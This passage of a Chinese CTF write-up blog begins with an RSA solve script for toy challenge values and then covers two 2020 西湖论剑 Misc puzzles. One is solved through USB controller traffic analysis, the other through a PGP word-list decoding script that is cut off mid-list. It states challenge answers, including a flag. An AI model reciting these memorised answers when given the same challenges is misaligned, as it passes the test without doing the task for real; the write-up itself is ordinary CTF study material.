</span></span><span class="line"><span class="cl"><span class="c1">#qp + q *p^2 = 1109691832903289208389283296592510864729403914873734836011311325874120780079555500202475594</span>
</span></span><span class="line"><span class="cl"><span class="c1"># q*p+q*p**2</span>
</span></span><span class="line"><span class="cl"><span class="c1"># s = Solver()</span>
</span></span><span class="line"><span class="cl"><span class="c1"># p = Int(&#39;p&#39;)</span>
</span></span><span class="line"><span class="cl"><span class="c1"># q = Int(&#39;q&#39;)</span>
</span></span><span class="line"><span class="cl"><span class="c1"># s.add(q+q*p**3==1285367317452089980789441829580397855321901891350429414413655782431779727560841427444135440068248152908241981758331600586)</span>
</span></span><span class="line"><span class="cl"><span class="c1"># s.add(q*p+q*p**2==1109691832903289208389283296592510864729403914873734836011311325874120780079555500202475594)</span>
</span></span><span class="line"><span class="cl"><span class="c1"># if s.check() == sat:</span>
</span></span><span class="line"><span class="cl"><span class="c1">#     print(s.model())</span>
</span></span><span class="line"><span class="cl"><span class="n">q</span> <span class="o">=</span> <span class="mi">827089796345539312201480770649</span>
</span></span><span class="line"><span class="cl"><span class="n">p</span> <span class="o">=</span> <span class="mi">1158310153629932205401500375817</span>
</span></span><span class="line"><span class="cl"><span class="n">n</span><span class="o">=</span><span class="n">p</span><span class="o">*</span><span class="n">q</span>
</span></span><span class="line"><span class="cl"><span class="n">phi</span> <span class="o">=</span> <span class="p">(</span><span class="n">p</span><span class="o">-</span><span class="mi">1</span><span class="p">)</span><span class="o">*</span><span class="p">(</span><span class="n">q</span><span class="o">-</span><span class="mi">1</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="n">d</span> <span class="o">=</span> <span class="n">gmpy2</span><span class="o">.</span><span class="n">invert</span><span class="p">(</span><span class="n">e</span><span class="p">,</span><span class="n">phi</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="n">m</span> <span class="o">=</span> <span class="nb">pow</span><span class="p">(</span><span class="n">c</span><span class="p">,</span><span class="n">d</span><span class="p">,</span><span class="n">n</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="nb">print</span><span class="p">(</span><span class="n">long_to_bytes</span><span class="p">(</span><span class="n">m</span><span class="p">))</span>
</span></span></code></pre></td></tr></table>
</div>
</div><h2 id="2020西湖论剑misc部分wp">2020西湖论剑Misc部分wp</h2>
<p>说是wp，不如说是被虐记录，啥都没做出来，铁废物了。希望看到的师傅轻点喷。<br />
希望有师傅能指导一下弟弟，主页有联系方式。</p>
<h3 id="yusa_yyds">Yusa_yyds</h3>
<p>官方wp说的震动一下四个包，咱也不知道，咱也不敢问。</p>
<p>过滤出xbox的流量</p>
<pre tabindex="0"><code>usb.addr == &#34;2.15.2&#34;
</code></pre><p>直接上图，我把时间间隔的第一个包都标记出来，这样就很明显了。</p>
<p><img src="https://img-blog.csdnimg.cn/20201011011207163.png" alt="" /></p>
<p>114514取32位小写md5就是flag</p>
<p>PS：同学有手柄到时候来试试看</p>
<h3 id="yusapapa">Yusapapa</h3>
<p>网页源码有个hint。Biometric list搜到 PGP词汇表，github有解码的，得到如下</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span><span class="lnt">3
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">You can see my collection puzzles in /hint.rar and another /encode.png.
</span></span><span class="line"><span class="cl">By the way,the picture shoud be used 
</span></span><span class="line"><span class="cl"><span class="s2">&#34;Yusa&#34;</span> is very important in this challenge!!
</span></span></code></pre></td></tr></table>
</div>
</div><p>后来自己也写了个脚本，GitHub地址<a href="https://www.github.com/ruokeqx/pypgpwords">欢迎star</a></p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt"> 1
</span><span class="lnt"> 2
</span><span class="lnt"> 3
</span><span class="lnt"> 4
</span><span class="lnt"> 5
</span><span class="lnt"> 6
</span><span class="lnt"> 7
</span><span class="lnt"> 8
</span><span class="lnt"> 9
</span><span class="lnt">10
</span><span class="lnt">11
</span><span class="lnt">12
</span><span class="lnt">13
</span><span class="lnt">14
</span><span class="lnt">15
</span><span class="lnt">16
</span><span class="lnt">17
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-python" data-lang="python"><span class="line"><span class="cl"><span class="n">cipher</span> <span class="o">=</span> <span class="s2">&#34;&#34;&#34;
</span></span></span><span class="line"><span class="cl"><span class="s2">endow gremlin indulge bison flatfoot fallout goldfish bison hockey fracture fracture bison goggles jawbone bison flatfoot gremlin glucose glucose fracture flatfoot indoors gazelle gremlin goldfish bison guidance indulge keyboard keyboard glucose fracture hockey bison gazelle goldfish bison cement frighten gazelle goldfish indoors buzzard highchair fallout highchair bison fallout goldfish flytrap bison fallout goldfish gremlin indoors frighten fracture highchair bison cement fracture goldfish flatfoot gremlin flytrap fracture buzzard guidance goldfish freedom buzzard allow crowfoot jawbone bison indoors frighten fracture bison involve fallout jawbone Burbank indoors frighten fracture bison guidance gazelle flatfoot indoors indulge highchair fracture bison hockey frighten gremlin indulge flytrap bison flagpole fracture bison indulge hockey fracture flytrap bison allow blockade endow indulge hockey fallout blockade bison gazelle hockey bison inverse fracture highchair jawbone bison gazelle goggles guidance gremlin highchair indoors fallout goldfish indoors bison gazelle goldfish bison indoors frighten gazelle hockey bison flatfoot frighten fallout glucose glucose fracture goldfish freedom fracture blackjack blackjack
</span></span></span><span class="line"><span class="cl"><span class="s2">&#34;&#34;&#34;</span>
</span></span><span class="line"><span class="cl"><span class="n">cipher</span> <span class="o">=</span> <span class="n">cipher</span><span class="o">.</span><span class="n">split</span><span class="p">()</span>
</span></span><span class="line"><span class="cl"><span class="n">odd_list</span> <span class="o">=</span> <span class="p">[</span><span class="s1">&#39;aardvark&#39;</span><span class="p">,</span> <span class="s1">&#39;absurd&#39;</span><span class="p">,</span> <span class="s1">&#39;accrue&#39;</span><span class="p">,</span> <span class="s1">&#39;acme&#39;</span><span class="p">,</span> <span class="s1">&#39;adrift&#39;</span><span class="p">,</span> <span class="s1">&#39;adult&#39;</span><span class="p">,</span> <span class="s1">&#39;afflict&#39;</span><span class="p">,</span> <span class="s1">&#39;ahead&#39;</span><span class="p">,</span> <span class="s1">&#39;aimless&#39;</span><span class="p">,</span> <span class="s1">&#39;Algol&#39;</span><span class="p">,</span> <span class="s1">&#39;allow&#39;</span><span class="p">,</span> <span class="s1">&#39;alone&#39;</span><span class="p">,</span> <span class="s1">&#39;ammo&#39;</span><span class="p">,</span> <span class="s1">&#39;ancient&#39;</span><span class="p">,</span> <span class="s1">&#39;apple&#39;</span><span class="p">,</span> <span class="s1">&#39;artist&#39;</span><span class="p">,</span> <span class="s1">&#39;assume&#39;</span><span class="p">,</span> <span class="s1">&#39;Athens&#39;</span><span class="p">,</span> <span class="s1">&#39;atlas&#39;</span><span class="p">,</span> <span class="s1">&#39;Aztec&#39;</span><span class="p">,</span> <span class="s1">&#39;baboon&#39;</span><span class="p">,</span> <span class="s1">&#39;backfield&#39;</span><span class="p">,</span> <span class="s1">&#39;backward&#39;</span><span class="p">,</span> <span class="s1">&#39;banjo&#39;</span><span class="p">,</span> <span class="s1">&#39;beaming&#39;</span><span class="p">,</span> <span class="s1">&#39;bedlamp&#39;</span><span class="p">,</span> <span class="s1">&#39;beehive&#39;</span><span class="p">,</span> <span class="s1">&#39;beeswax&#39;</span><span class="p">,</span> <span class="s1">&#39;befriend&#39;</span><span class="p">,</span> <span class="s1">&#39;Belfast&#39;</span><span class="p">,</span> <span class="s1">&#39;berserk&#39;</span><span class="p">,</span> <span class="s1">&#39;billiard&#39;</span><span class="p">,</span> <span class="s1">&#39;bison&#39;</span><span class="p">,</span> <span class="s1">&#39;blackjack&#39;</span><span class="p">,</span> <span class="s1">&#39;blockade&#39;</span><span class="p">,</span> <span class="s1">&#39;blowtorch&#39;</span><span class="p">,</span> <span class="s1">&#39;bluebird&#39;</span><span class="p">,</span> <span class="s1">&#39;bombast&#39;</span><span class="p">,</span> <span class="s1">&#39;bookshelf&#39;</span><span class="p">,</span> <span class="s1">&#39;brackish&#39;</span><span class="p">,</span> <span class="s1">&#39;breadline&#39;</span><span class="p">,</span> <span class="s1">&#39;breakup&#39;</span><span class="p">,</span> <span class="s1">&#39;brickyard&#39;</span><span class="p">,</span> <span class="s1">&#39;briefcase&#39;</span><span class="p">,</span> <span class="s1">&#39;Burbank&#39;</span><span class="p">,</span> <span class="s1">&#39;button&#39;</span><span class="p">,</span> <span class="s1">&#39;buzzard&#39;</span><span class="p">,</span> <span class="s1">&#39;cement&#39;</span><span class="p">,</span> <span class="s1">&#39;chairlift&#39;</span><span class="p">,</span> <span class="s1">&#39;chatter&#39;</span><span class="p">,</span> <span class="s1">&#39;checkup&#39;</span><span class="p">,</span> <span class="s1">&#39;chisel&#39;</span><span class="p">,</span> <span class="s1">&#39;choking&#39;</span><span class="p">,</span> <span class="s1">&#39;chopper&#39;</span><span class="p">,</span> <span class="s1">&#39;Christmas&#39;</span><span class="p">,</span> <span class="s1">&#39;clamshell&#39;</span><span class="p">,</span> <span class="s1">&#39;classic&#39;</span><span class="p">,</span> <span class="s1">&#39;classroom&#39;</span><span class="p">,</span> <span class="s1">&#39;cleanup&#39;</span><span class="p">,</span> <span class="s1">&#39;clockwork&#39;</span><span class="p">,</span> <span class="s1">&#39;cobra&#39;</span><span class="p">,</span> <span class="s1">&#39;commence&#39;</span><span class="p">,</span> <span class="s1">&#39;concert&#39;</span><span class="p">,</span> <span class="s1">&#39;cowbell&#39;</span><span class="p">,</span> <span class="s1">&#39;crackdown&#39;</span><span class="p">,</span> <span class="s1">&#39;cranky&#39;</span><span class="p">,</span> <span class="s1">&#39;crowfoot&#39;</span><span class="p">,</span> <span class="s1">&#39;crucial&#39;</span><span class="p">,</span> <span class="s1">&#39;crumpled&#39;</span><span class="p">,</span> <span class="s1">&#39;crusade&#39;</span><span class="p">,</span> <span class="s1">&#39;cubic&#39;</span><span class="p">,</span> <span class="s1">&#39;dashboard&#39;</span><span class="p">,</span> <span class="s1">&#39;deadbolt&#39;</span><span class="p">,</span> <span class="s1">&#39;deckhand&#39;</span><span class="p">,</span> <span class="s1">&#39;dogsled&#39;</span><span class="p">,</span> <span class="s1">&#39;dragnet&#39;</span><span class="p">,</span> <span class="s1">&#39;drainage&#39;</span><span class="p">,</span> <span class="s1">&#39;dreadful&#39;</span><span class="p">,</span> <span class="s1">&#39;drifter&#39;</span><span class="p">,</span> <span class="s1">&#39;dropper&#39;</span><span class="p">,</span> <span class="s1">&#39;drumbeat&#39;</span><span class="p">,</span> <span class="s1">&#39;drunken&#39;</span><span class="p">,</span> <span class="s1">&#39;Dupont&#39;</span><span class="p">,</span> <span class="s1">&#39;dwelling&#39;</span><span class="p">,</span> <span class="s1">&#39;eating&#39;</span><span class="p">,</span> <span class="s1">&#39;edict&#39;</span><span class="p">,</span> <span class="s1">&#39;egghead&#39;</span><span class="p">,</span> <span class="s1">&#39;eightball&#39;</span><span class="p">,</span> <span class="s1">&#39;endorse&#39;</span><span class="p">,</span> <span class="s1">&#39;endow&#39;</span><span class="p">,</span> <span class="s1">&#39;enlist&#39;</span><span class="p">,</span> <span class="s1">&#39;erase&#39;</span><span class="p">,</span> <span class="s1">&#39;escape&#39;</span><span class="p">,</span> <span class="s1">&#39;exceed&#39;</span><span class="p">,</span> <span class="s1">&#39;eyeglass&#39;</span><span class="p">,</span> <span class="s1">&#39;eyetooth&#39;</span><span class="p">,</span> <span class="s1">&#39;facial&#39;</span><span class="p">,</span> <span class="s1">&#39;fallout&#39;</span><span class="p">,</span> <span class="s1">&#39;flagpole&#39;</span><span class="p">,</span> <span class="s1">&#39;flatfoot&#39;</span><span class="p">,</span> <span class="s1">&#39;flytrap&#39;</span><span class="p">,</span> <span class="s1">&#39;fracture&#39;</span><span class="p">,</span> <span class="s1">&#39;framework&#39;</span><span class="p">,</span> <span class="s1">&#39;freedom&#39;</span><span class="p">,</span> <span class="s1">&#39;frighten&#39;</span><span class="p">,</span> <span class="s1">&#39;gazelle&#39;</span><span class="p">,</span> <span class="s1">&#39;Geiger&#39;</span><span class="p">,</span> <span class="s1">&#39;glitter&#39;</span><span class="p">,</span> <span class="s1">&#39;glucose&#39;</span><span class="p">,</span> <span class="s1">&#39;goggles&#39;</span><span class="p">,</span> <span class="s1">&#39;goldfish&#39;</span><span class="p">,</span> <span class="s1">&#39;gremlin&#39;</span><span class="p">,</span> <span class="s1">&#39;guidance&#39;</span><span class="p">,</span> <span class="s1">&#39;hamlet&#39;</span><span class="p">,</span> <span class="s1">&#39;highchair&#39;</span><span class="p">,</span> <span class="s1">&#39;hockey&#39;</span><span class="p">,</span> <span class="s1">&#39;indoors&#39;</span><span class="p">,</span> <span class="s1">&#39;indulge&#39;</span><span class="p">,</span> <span class="s1">&#39;inverse&#39;</span><span class="p">,</span> <span class="s1">&#39;involve&#39;</span><span class="p">,</span> <span class="s1">&#39;island&#39;</span><span class="p">,</span> <span class="s1">&#39;jawbone&#39;</span><span class="p">,</span> <span class="s1">&#39;keyboard&#39;</span><span class="p">,</span> <span class="s1">&#39;kickoff&#39;</span><span class="p">,</span> <span class="s1">&#39;kiwi&#39;</span><span class="p">,</span> <span class="s1">&#39;klaxon&#39;</span><span class="p">,</span> <span class="s1">&#39;locale&#39;</span><span class="p">,</span> <span class="s1">&#39;lockup&#39;</span><span class="p">,</span> <span class="s1">&#39;merit&#39;</span><span class="p">,</span> <span class="s1">&#39;minnow&#39;</span><span class="p">,</span> <span class="s1">&#39;miser&#39;</span><span class="p">,</span> <span class="s1">&#39;Mohawk&#39;</span><span class="p">,</span> <span class="s1">&#39;mural&#39;</span><span class="p">,</span> <span class="s1">&#39;music&#39;</span><span class="p">,</span> <span class="s1">&#39;necklace&#39;</span><span class="p">,</span> <span class="s1">&#39;Neptune&#39;</span><span class="p">,</span> <span class="s1">&#39;newborn&#39;</span><span class="p">,</span> <span class="s1">&#39;nightbird&#39;</span><span class="p">,</span> <span class="s1">&#39;Oakland&#39;</span><span class="p">,</span> <span class="s1">&#39;obtuse&#39;</span><span class="p">,</span> <span class="s1">&#39;offload&#39;</span><span class="p">,</span> <span class="s1">&#39;optic&#39;</span><span class="p">,</span> <span class="s1">&#39;orca&#39;</span><span class="p">,</span> <span class="s1">&#39;payday&#39;</span><span class="p">,</span> <span class="s1">&#39;peachy&#39;</span><span class="p">,</span> <span class="s1">&#39;pheasant&#39;</span><span class="p">,</span> <span class="s1">&#39;physique&#39;</span><span class="p">,</span> <span class="s1">&#39;playhouse&#39;</span><span class="p">,</span> <span class="s1">&#39;Pluto&#39;</span><span class="p">,</span> <span class="s1">&#39;preclude&#39;</span><span class="p">,</span> <span class="s1">&#39;prefer&#39;</span><span class="p">,</span> <span class="s1">&#39;preshrunk&#39;</span><span class="p">,</span> <span class="s1">&#39;printer&#39;</span><span class="p">,</span> <span class="s1">&#39;prowler&#39;</span><span class="p">,</span> <span class="s1">&#39;pupil&#39;</span><span class="p">,</span> <span class="s1">&#39;puppy&#39;</span><span class="p">,</span> <span class="s1">&#39;python&#39;</span><span class="p">,</span> <span class="s1">&#39;quadrant&#39;</span><span class="p">,</span> <span class="s1">&#39;quiver&#39;</span><span class="p">,</span> <span class="s1">&#39;quota&#39;</span><span class="p">,</span> <span class="s1">&#39;ragtime&#39;</span><span class="p">,</span> <span class="s1">&#39;ratchet&#39;</span><span class="p">,</span> <span class="s1">&#39;rebirth&#39;</span><span class="p">,</span> <span class="s1">&#39;reform&#39;</span><span class="p">,</span> <span class="s1">&#39;regain&#39;</span><span class="p">,</span> <span class="s1">&#39;reindeer&#39;</span><span class="p">,</span> <span class="s1">&#39;rematch&#39;</span><span class="p">,</span> <span class="s1">&#39;repay&#39;</span><span class="p">,</span> <span class="s1">&#39;retouch&#39;</span><span class="p">,</span> <span class="s1">&#39;revenge&#39;</span><span class="p">,</span> <span class="s1">&#39;reward&#39;</span><span class="p">,</span> <span class="s1">&#39;rhythm&#39;</span><span class="p">,</span> <span class="s1">&#39;ribcage&#39;</span><span class="p">,</span> <span class="s1">&#39;ringbolt&#39;</span><span class="p">,</span> <span class="s1">&#39;robust&#39;</span><span class="p">,</span> <span class="s1">&#39;rocker&#39;</span><span class="p">,</span> <span class="s1">&#39;ruffled&#39;</span><span class="p">,</span> <span class="s1">&#39;sailboat&#39;</span><span class="p">,</span> <span class="s1">&#39;sawdust&#39;</span><span class="p">,</span> <span class="s1">&#39;scallion&#39;</span><span class="p">,</span> <span class="s1">&#39;scenic&#39;</span><span class="p">,</span> <span class="s1">&#39;scorecard&#39;</span><span class="p">,</span> <span class="s1">&#39;Scotland&#39;</span><span class="p">,</span> <span class="s1">&#39;seabird&#39;</span><span class="p">,</span> <span class="s1">&#39;select&#39;</span><span class="p">,</span> <span class="s1">&#39;sentence&#39;</span><span class="p">,</span> <span class="s1">&#39;shadow&#39;</span><span class="p">,</span> <span class="s1">&#39;shamrock&#39;</span><span class="p">,</span> <span class="s1">&#39;showgirl&#39;</span><span class="p">,</span> <span class="s1">&#39;skullcap&#39;</span><span class="p">,</span> <span class="s1">&#39;skydive&#39;</span><span class="p">,</span> <span class="s1">&#39;slingshot&#39;</span><span class="p">,</span> <span class="s1">&#39;slowdown&#39;</span><span class="p">,</span> <span class="s1">&#39;snapline&#39;</span><span class="p">,</span> <span class="s1">&#39;snapshot&#39;</span><span class="p">,</span> <span class="s1">&#39;snowcap&#39;</span><span class="p">,</span> <span class="s1">&#39;snowslide&#39;</span><span class="p">,</span> <span class="s1">&#39;solo&#39;</span><span class="p">,</span> <span class="s1">&#39;southward&#39;</span><span class="p">,</span> <span class="s1">&#39;soybean&#39;</span><span class="p">,</span> <span class="s1">&#39;spaniel&#39;</span><span class="p">,</span> <span class="s1">&#39;spearhead&#39;</span><span class="p">,</span> <span class="s1">&#39;spellbind&#39;</span><span class="p">,</span> <span class="s1">&#39;spheroid&#39;</span><span class="p">,</span> <span class="s1">&#39;spigot&#39;</span><span class="p">,</span> <span class="s1">&#39;spindle&#39;</span><span class="p">,</span> <span class="s1">&#39;spyglass&#39;</span><span class="p">,</span> <span class="s1">&#39;stagehand&#39;</span><span class="p">,</span> <span class="s1">&#39;stagnate&#39;</span><span class="p">,</span> <span class="s1">&#39;stairway&#39;</span><span class="p">,</span> <span class="s1">&#39;standard&#39;</span><span class="p">,</span> <span class="s1">&#39;stapler&#39;</span><span class="p">,</span> <span class="s1">&#39;steamship&#39;</span><span class="p">,</span> <span class="s1">&#39;sterling&#39;</span><span class="p">,</span> <span class="s1">&#39;stockman&#39;</span><span class="p">,</span> <span class="s1">&#39;stopwatch&#39;</span><span class="p">,</span> <span class="s1">&#39;stormy&#39;</span><span class="p">,</span> <span class="s1">&#39;sugar&#39;</span><span class="p">,</span> <span class="s1">&#39;surmount&#39;</span><span class="p">,</span> <span class="s1">&#39;suspense&#39;</span><span class="p">,</span> <span class="s1">&#39;sweatband&#39;</span><span class="p">,</span> <span class="s1">&#39;swelter&#39;</span><span class="p">,</span> <span class="s1">&#39;tactics&#39;</span><span class="p">,</span> <span class="s1">&#39;talon&#39;</span><span class="p">,</span> <span class="s1">&#39;tapeworm&#39;</span><span class="p">,</span> <span class="s1">&#39;tempest&#39;</span><span class="p">,</span> <span class="s1">&#39;tiger&#39;</span><span class="p">,</span> <span class="s1">&#39;tissue&#39;</span><span class="p">,</span> <span class="s1">&#39;tonic&#39;</span><span class="p">,</span> <span class="s1">&#39;topmost&#39;</span><span class="p">,</span> <span class="s1">&#39;tracker&#39;</span><span class="p">,</span> <span class="s1">&#39;transit&#39;</span><span class="p">,</span> <span class="s1">&#39;trauma&#39;</span><span class="p">,</span> <span class="s1">&#39;treadmill&#39;</span><span class="p">,</span> <span class="s1">&#39;Trojan&#39;</span><span class="p">,</span> <span class="s1">&#39;trouble&#39;</span><span class="p">,</span> <span class="s1">&#39;tumor&#39;</span><span class="p">,</span> <span class="s1">&#39;tunnel&#39;</span><span class="p">,</span> <span class="s1">&#39;tycoon&#39;</span><span class="p">,</span> <span class="s1">&#39;uncut&#39;</span><span class="p">,</span> <span class="s1">&#39;unearth&#39;</span><span class="p">,</span> <span class="s1">&#39;unwind&#39;</span><span class="p">,</span> <span class="s1">&#39;uproot&#39;</span><span class="p">,</span> <span class="s1">&#39;upset&#39;</span><span class="p">,</span> <span class="s1">&#39;upshot&#39;</span><span class="p">,</span> <span class="s1">&#39;vapor&#39;</span><span class="p">,</span> <span class="s1">&#39;village&#39;</span><span class="p">,</span> <span class="s1">&#39;virus&#39;</span><span class="p">,</span> <span class="s1">&#39;Vulcan&#39;</span><span class="p">,</span> <span class="s1">&#39;waffle&#39;</span><span class="p">,</span> <span class="s1">&#39;wallet&#39;</span><span class="p">,</span> <span class="s1">&#39;watchword&#39;</span><span class="p">,</span> <span class="s1">&#39;wayside&#39;</span><span class="p">,</span> <span class="s1">&#39;willow&#39;</span><span class="p">,</span> <span class="s1">&#39;woodlark&#39;</span><span class="p">,</span> <span class="s1">&#39;Zulu&#39;</span><span class="p">]</span>
</span></span><span class="line"><span class="cl"><span class="n">even_list</span> <span class="o">=</span> <span class="p">[</span><span class="s1">&#39;adroitness&#39;</span><span class="p">,</span> <span class="s1">&#39;adviser&#39;</span><span class="p">,</span> <span class="s1">&#39;aftermath&#39;</span><span class="p">,</span> <span class="s1">&#39;aggregate&#39;</span><span class="p">,</span> <span class="s1">&#39;alkali&#39;</span><span class="p">,</span> <span class="s1">&#39;almighty&#39;</span><span class="p">,</span> <span class="s1">&#39;amulet&#39;</span><span class="p">,</span> <span class="s1">&#39;amusement&#39;</span><span class="p">,</span> <span class="s1">&#39;antenna&#39;</span><span class="p">,</span> <span class="s1">&#39;applicant&#39;</span><span class="p">,</span> <span class="s1">&#39;Apollo&#39;</span><span class="p">,</span> <span class="s1">&#39;armistice&#39;</span><span class="p">,</span> <span class="s1">&#39;article&#39;</span><span class="p">,</span> <span class="s1">&#39;asteroid&#39;</span><span class="p">,</span> <span class="s1">&#39;Atlantic&#39;</span><span class="p">,</span> <span class="s1">&#39;atmosphere&#39;</span><span class="p">,</span> <span class="s1">&#39;autopsy&#39;</span><span class="p">,</span> <span class="s1">&#39;Babylon&#39;</span><span class="p">,</span> <span class="s1">&#39;backwater&#39;</span><span class="p">,</span> <span class="s1">&#39;barbecue&#39;</span><span class="p">,</span> <span class="s1">&#39;belowground&#39;</span><span class="p">,</span> <span class="s1">&#39;bifocals&#39;</span><span class="p">,</span> <span class="s1">&#39;bodyguard&#39;</span><span class="p">,</span> <span class="s1">&#39;bookseller&#39;</span><span class="p">,</span> <span class="s1">&#39;borderline&#39;</span><span class="p">,</span> <span class="s1">&#39;bottomless&#39;</span><span class="p">,</span> <span class="s1">&#39;Bradbury&#39;</span><span class="p">,</span> <span class="s1">&#39;bravado&#39;</span><span class="p">,</span> <span class="s1">&#39;Brazilian&#39;</span><span class="p">,</span> <span class="s1">&#39;breakaway&#39;</span><span class="p">,</span> <span class="s1">&#39;Burlington&#39;</span><span class="p">,</span> <span class="s1">&#39;businessman&#39;</span><span class="p">,</span> <span class="s1">&#39;butterfat&#39;</span><span class="p">,</span> <span class="s1">&#39;Camelot&#39;</span><span class="p">,</span> <span class="s1">&#39;candidate&#39;</span><span class="p">,</span> <span class="s1">&#39;cannonball&#39;</span><span class="p">,</span> <span class="s1">&#39;Capricorn&#39;</span><span class="p">,</span> <span class="s1">&#39;caravan&#39;</span><span class="p">,</span> <span class="s1">&#39;caretaker&#39;</span><span class="p">,</span> <span class="s1">&#39;celebrate&#39;</span><span class="p">,</span> <span class="s1">&#39;cellulose&#39;</span><span class="p">,</span> <span class="s1">&#39;certify&#39;</span><span class="p">,</span> <span class="s1">&#39;chambermaid&#39;</span><span class="p">,</span> <span class="s1">&#39;Cherokee&#39;</span><span class="p">,</span> <span class="s1">&#39;Chicago&#39;</span><span class="p">,</span> <span class="s1">&#39;clergyman&#39;</span><span class="p">,</span> <span class="s1">&#39;coherence&#39;</span><span class="p">,</span> <span class="s1">&#39;combustion&#39;</span><span class="p">,</span> <span class="s1">&#39;commando&#39;</span><span class="p">,</span> <span class="s1">&#39;company&#39;</span><span class="p">,</span> <span class="s1">&#39;component&#39;</span><span class="p">,</span> <span class="s1">&#39;concurrent&#39;</span><span class="p">,</span> <span class="s1">&#39;confidence&#39;</span><span class="p">,</span> <span class="s1">&#39;conformist&#39;</span><span class="p">,</span> <span class="s1">&#39;congregate&#39;</span><span class="p">,</span> <span class="s1">&#39;consensus&#39;</span><span class="p">,</span> <span class="s1">&#39;consulting&#39;</span><span class="p">,</span> <span class="s1">&#39;corporate&#39;</span><span class="p">,</span> <span class="s1">&#39;corrosion&#39;</span><span class="p">,</span> <span class="s1">&#39;councilman&#39;</span><span class="p">,</span> <span class="s1">&#39;crossover&#39;</span><span class="p">,</span> <span class="s1">&#39;crucifix&#39;</span><span class="p">,</span> <span class="s1">&#39;cumbersome&#39;</span><span class="p">,</span> <span class="s1">&#39;customer&#39;</span><span class="p">,</span> <span class="s1">&#39;Dakota&#39;</span><span class="p">,</span> <span class="s1">&#39;decadence&#39;</span><span class="p">,</span> <span class="s1">&#39;December&#39;</span><span class="p">,</span> <span class="s1">&#39;decimal&#39;</span><span class="p">,</span> <span class="s1">&#39;designing&#39;</span><span class="p">,</span> <span class="s1">&#39;detector&#39;</span><span class="p">,</span> <span class="s1">&#39;detergent&#39;</span><span class="p">,</span> <span class="s1">&#39;determine&#39;</span><span class="p">,</span> <span class="s1">&#39;dictator&#39;</span><span class="p">,</span> <span class="s1">&#39;dinosaur&#39;</span><span class="p">,</span> <span class="s1">&#39;direction&#39;</span><span class="p">,</span> <span class="s1">&#39;disable&#39;</span><span class="p">,</span> <span class="s1">&#39;disbelief&#39;</span><span class="p">,</span> <span class="s1">&#39;disruptive&#39;</span><span class="p">,</span> <span class="s1">&#39;distortion&#39;</span><span class="p">,</span> <span class="s1">&#39;document&#39;</span><span class="p">,</span> <span class="s1">&#39;embezzle&#39;</span><span class="p">,</span> <span class="s1">&#39;enchanting&#39;</span><span class="p">,</span> <span class="s1">&#39;enrollment&#39;</span><span class="p">,</span> <span class="s1">&#39;enterprise&#39;</span><span class="p">,</span> <span class="s1">&#39;equation&#39;</span><span class="p">,</span> <span class="s1">&#39;equipment&#39;</span><span class="p">,</span> <span class="s1">&#39;escapade&#39;</span><span class="p">,</span> <span class="s1">&#39;Eskimo&#39;</span><span class="p">,</span> <span class="s1">&#39;everyday&#39;</span><span class="p">,</span> <span class="s1">&#39;examine&#39;</span><span class="p">,</span> <span class="s1">&#39;existence&#39;</span><span class="p">,</span> <span class="s1">&#39;exodus&#39;</span><span class="p">,</span> <span class="s1">&#39;fascinate&#39;</span><span class="p">,</span> <span class="s1">&#39;filament&#39;</span><span class="p">,</span> <span class="s1">&#39;finicky&#39;</span><span class="p">,</span> <span class="s1">&#39;forever&#39;</span><span class="p">,</span> <span class="s1">&#39;fortitude&#39;</span><span class="p">,</span> <span class="s1">&#39;frequency&#39;</span><span class="p">,</span> <span class="s1">&#39;gadgetry&#39;</span><span class="p">,</span> <span class="s1">&#39;Galveston&#39;</span><span class="p">,</span> <span class="s1">&#39;getaway&#39;</span><span class="p">,</span> <span class="s1">&#39;glossary&#39;</span><span class="p">,</span> <span class="s1">&#39;gossamer&#39;</span><span class="p">,</span> <span class="s1">&#39;graduate&#39;</span><span class="p">,</span> <span class="s1">&#39;gravity&#39;</span><span class="p">,</span> <span class="s1">&#39;guitarist&#39;</span><span class="p">,</span> <span class="s1">&#39;hamburger&#39;</span><span class="p">,</span> <span class="s1">&#39;Hamilton&#39;</span><span class="p">,</span> <span class="s1">&#39;handiwork&#39;</span><span class="p">,</span> <span class="s1">&#39;hazardous&#39;</span><span class="p">,</span> <span class="s1">&#39;headwaters&#39;</span><span class="p">,</span> <span class="s1">&#39;hemisphere&#39;</span><span class="p">,</span> <span class="s1">&#39;hesitate&#39;</span><span class="p">,</span> <span class="s1">&#39;hideaway&#39;</span><span class="p">,</span> <span class="s1">&#39;holiness&#39;</span><span class="p">,</span> <span class="s1">&#39;hurricane&#39;</span><span class="p">,</span> <span class="s1">&#39;hydraulic&#39;</span><span class="p">,</span> <span class="s1">&#39;impartial&#39;</span><span class="p">,</span> <span class="s1">&#39;impetus&#39;</span><span class="p">,</span> <span class="s1">&#39;inception&#39;</span><span class="p">,</span> <span class="s1">&#39;indigo&#39;</span><span class="p">,</span> <span class="s1">&#39;inertia&#39;</span><span class="p">,</span> <span class="s1">&#39;infancy&#39;</span><span class="p">,</span> <span class="s1">&#39;inferno&#39;</span><span class="p">,</span> <span class="s1">&#39;informant&#39;</span><span class="p">,</span> <span class="s1">&#39;insincere&#39;</span><span class="p">,</span> <span class="s1">&#39;insurgent&#39;</span><span class="p">,</span> <span class="s1">&#39;integrate&#39;</span><span class="p">,</span> <span class="s1">&#39;intention&#39;</span><span class="p">,</span> <span class="s1">&#39;inventive&#39;</span><span class="p">,</span> <span class="s1">&#39;Istanbul&#39;</span><span class="p">,</span> <span class="s1">&#39;Jamaica&#39;</span><span class="p">,</span> <span class="s1">&#39;Jupiter&#39;</span><span class="p">,</span> <span class="s1">&#39;leprosy&#39;</span><span class="p">,</span> <span class="s1">&#39;letterhead&#39;</span><span class="p">,</span> <span class="s1">&#39;liberty&#39;</span><span class="p">,</span> <span class="s1">&#39;maritime&#39;</span><span class="p">,</span> <span class="s1">&#39;matchmaker&#39;</span><span class="p">,</span> <span class="s1">&#39;maverick&#39;</span><span class="p">,</span> <span class="s1">&#39;Medusa&#39;</span><span class="p">,</span> <span 